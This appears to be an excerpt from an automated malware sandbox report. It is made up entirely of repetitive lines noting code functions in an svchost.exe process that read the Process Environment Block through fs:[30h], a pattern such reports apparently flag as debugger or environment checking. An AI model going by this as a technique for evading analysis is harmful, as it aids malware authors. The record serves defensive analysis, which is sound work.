                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h]2_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h]2_2_036B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov ecx, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h]2_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h]2_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h]2_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365438F mov eax, dword ptr fs:[00000030h]2_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628397 mov eax, dword ptr fs:[00000030h]2_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634260 mov eax, dword ptr fs:[00000030h]2_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362826B mov eax, dword ptr fs:[00000030h]2_2_0362826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h]2_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov eax, dword ptr fs:[00000030h]2_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B8243 mov ecx, dword ptr fs:[00000030h]2_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370625D mov eax, dword ptr fs:[00000030h]2_2_0370625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A250 mov eax, dword ptr fs:[00000030h]2_2_0362A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636259 mov eax, dword ptr fs:[00000030h]2_2_03636259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h]2_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362823B mov eax, dword ptr fs:[00000030h]2_2_0362823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h]2_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h]2_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037062D6 mov eax, dword ptr fs:[00000030h]2_2_037062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov ecx, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h]2_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h]2_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h]2_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704164 mov eax, dword ptr fs:[00000030h]2_2_03704164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov ecx, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h]2_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C156 mov eax, dword ptr fs:[00000030h]2_2_0362C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C8158 mov eax, dword ptr fs:[00000030h]2_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636154 mov eax, dword ptr fs:[00000030h]2_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660124 mov eax, dword ptr fs:[00000030h]2_2_03660124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h]2_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov ecx, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h]2_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F0115 mov eax, dword ptr fs:[00000030h]2_2_036F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037061E5 mov eax, dword ptr fs:[00000030h]2_2_037061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036601F8 mov eax, dword ptr fs:[00000030h]2_2_036601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h]2_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h]2_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03670185 mov eax, dword ptr fs:[00000030h]2_2_03670185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h]2_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h]2_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B019F mov eax, dword ptr fs:[00000030h]2_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h]2_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365C073 mov eax, dword ptr fs:[00000030h]2_2_0365C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632050 mov eax, dword ptr fs:[00000030h]2_2_03632050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6050 mov eax, dword ptr fs:[00000030h]2_2_036B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A020 mov eax, dword ptr fs:[00000030h]2_2_0362A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C020 mov eax, dword ptr fs:[00000030h]2_2_0362C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6030 mov eax, dword ptr fs:[00000030h]2_2_036C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4000 mov ecx, dword ptr fs:[00000030h]2_2_036B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h]2_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h]2_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0362A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036380E9 mov eax, dword ptr fs:[00000030h]2_2_036380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B60E0 mov eax, dword ptr fs:[00000030h]2_2_036B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C0F0 mov eax, dword ptr fs:[00000030h]2_2_0362C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036720F0 mov ecx, dword ptr fs:[00000030h]2_2_036720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B20DE mov eax, dword ptr fs:[00000030h]2_2_036B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036280A0 mov eax, dword ptr fs:[00000030h]2_2_036280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C80A8 mov eax, dword ptr fs:[00000030h]2_2_036C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov eax, dword ptr fs:[00000030h]2_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F60B8 mov ecx, dword ptr fs:[00000030h]2_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363208A mov eax, dword ptr fs:[00000030h]2_2_0363208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638770 mov eax, dword ptr fs:[00000030h]2_2_03638770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640770 mov eax, dword ptr fs:[00000030h]2_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov esi, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630750 mov eax, dword ptr fs:[00000030h]2_2_03630750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE75D mov eax, dword ptr fs:[00000030h]2_2_036BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4755 mov eax, dword ptr fs:[00000030h]2_2_036B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov ecx, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AC730 mov eax, dword ptr fs:[00000030h]2_2_036AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C700 mov eax, dword ptr fs:[00000030h]2_2_0366C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630710 mov eax, dword ptr fs:[00000030h]2_2_03630710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660710 mov eax, dword ptr fs:[00000030h]2_2_03660710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE7E1 mov eax, dword ptr fs:[00000030h]2_2_036BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C0 mov eax, dword ptr fs:[00000030h]2_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B07C3 mov eax, dword ptr fs:[00000030h]2_2_036B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036307AF mov eax, dword ptr fs:[00000030h]2_2_036307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E47A0 mov eax, dword ptr fs:[00000030h]2_2_036E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D678E mov eax, dword ptr fs:[00000030h]2_2_036D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03662674 mov eax, dword ptr fs:[00000030h]2_2_03662674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364C640 mov eax, dword ptr fs:[00000030h]2_2_0364C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E627 mov eax, dword ptr fs:[00000030h]2_2_0364E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03666620 mov eax, dword ptr fs:[00000030h]2_2_03666620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668620 mov eax, dword ptr fs:[00000030h]2_2_03668620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363262C mov eax, dword ptr fs:[00000030h]2_2_0363262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE609 mov eax, dword ptr fs:[00000030h]2_2_036AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672619 mov eax, dword ptr fs:[00000030h]2_2_03672619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov eax, dword ptr fs:[00000030h]2_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C6A6 mov eax, dword ptr fs:[00000030h]2_2_0366C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036666B0 mov eax, dword ptr fs:[00000030h]2_2_036666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
